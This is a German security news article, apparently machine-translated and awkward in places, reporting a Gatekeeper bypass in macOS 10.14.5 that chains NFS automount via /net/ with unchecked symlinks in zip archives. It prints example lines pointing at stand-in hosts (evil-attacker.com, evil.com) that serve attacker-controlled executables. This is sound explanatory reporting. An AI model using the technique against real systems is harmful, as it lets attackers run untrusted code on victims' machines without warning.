Eine ungepatchte Schwachstelle in macOS 10.14.5 auch bekannt als Mojave wurde vor kurzem entdeckt. Der Fehler kann ein Angreifer ohne die Notwendigkeit der Interaktion mit dem Benutzer beliebigen Code auszuführen, also unter Umgehung Torwächter.
Diese Entdeckung stammt aus Forschern Filippo Cavallarin aus Segment, eine in Italien ansässige Firma Cyber. "Auf MacOS X-Version <= 10.14.5 (at time of writing) it is possible to easily bypass Gatekeeper in order to execute untrusted code without any warning or user's explicit permission,“Die Forscher schrieben.
Wie ist der Torwächter Bypass möglich?
Erste, es sei darauf hingewiesen, dass es in Torwächter Design ist sowohl externe Laufwerke und Netzwerkfreigaben als sichere Ort zu akzeptieren, so dass Anwendungen, die sie enthalten, einwandfrei laufen. Jedoch, indem sie zusammen zwei legitime Eigenschaften macOS, es ist möglich, die Torwächter und sein „zu täuschenbeabsichtigtes Verhalten".
So, was sind diese Funktionen? Die erste erlaubt es einem Benutzer, automatisch eine Netzwerkfreigabe bereitstellen, indem Sie einfach einen Pfad beginnend mit der Annahme „/ net /“:
Beispielsweise
ls /net/evil-attacker.com/sharedfolder/
machen das Betriebssystem den Inhalt des ‚shared lesen’ auf der Remote-Host (evil-attacker.com) mit NFS.
Die andere Funktion ist über zip-Archive enthalten symbolische Links, die zu beliebigen Orten zeigen. Weiter, die Software, die Zip-Dateien auf macOS dekomprimiert führt keine Überprüfungen der Symlinks vor ihnen zu schaffen, Der Forscher erklärt.
Wie würde ein Arbeits Angriff? Ein Angreifer kann mit einem symbolischen Link zu einem auto Hacker gesteuerte Endpunkt eine Zip-Datei Handwerk (ex Documents -> /net/evil.com/Documents) und könnte es zu einem gezielten System senden. Der Benutzer laden Sie das bösartige Archiv, und würde die bösartige Datei extrahieren, ohne etwas zu ahnen,.
Jetzt ist das Opfer in einem vom Angreifer kontrolliert, aber vertrauen durch Torwächter, so dass jeder Angreifer kontrollierte ausführbare Datei kann ohne Warnung ausgeführt werden. Die Art und Weise Finder ist so konzipiert, (ex verstecken .app Erweiterungen, verstecken vollständigen Pfad von titlebar) macht diesen tecnique sehr effektiv und schwer zu erkennen, die Forscher festgestellt,.
Es gibt auch ein Video-Demonstration wie diese Bypass-Werke Torwächter.
Dies ist nicht der erste Fall von macOS build-in Schutz a.k.a. Torwächter wird umgangen. Im Februar dieses Jahres, Trend Micro Sicherheitsexperten entdeckt, dass eine böswillige Windows-EXE-Datei Mac-Computer infizieren könnte, und könnte infostealer Malware von Adware auf ihren Systemen begleitet herunterladen.
In diesem Fall, die EXE-Dateien konnten Torwächter Schutz entziehen, weil sie nicht von der Software überprüft wurden, entworfen nur native Mac-Dateien zu überprüfen. Dies könnte dazu führen, die Code Signaturprüfung zu umgehen und Verifikation.
Milena Dimitrova
Ein begeisterter Autor und Content Manager, der seit Projektbeginn bei SensorsTechForum ist. Ein Profi mit 10+ jahrelange Erfahrung in der Erstellung ansprechender Inhalte. Konzentriert sich auf die Privatsphäre der Nutzer und Malware-Entwicklung, sie die feste Überzeugung, in einer Welt, in der Cybersicherheit eine zentrale Rolle spielt. Wenn der gesunde Menschenverstand macht keinen Sinn, sie wird es sich Notizen zu machen. Diese Noten drehen können später in Artikel! Folgen Sie Milena @Milenyim
Folge mir: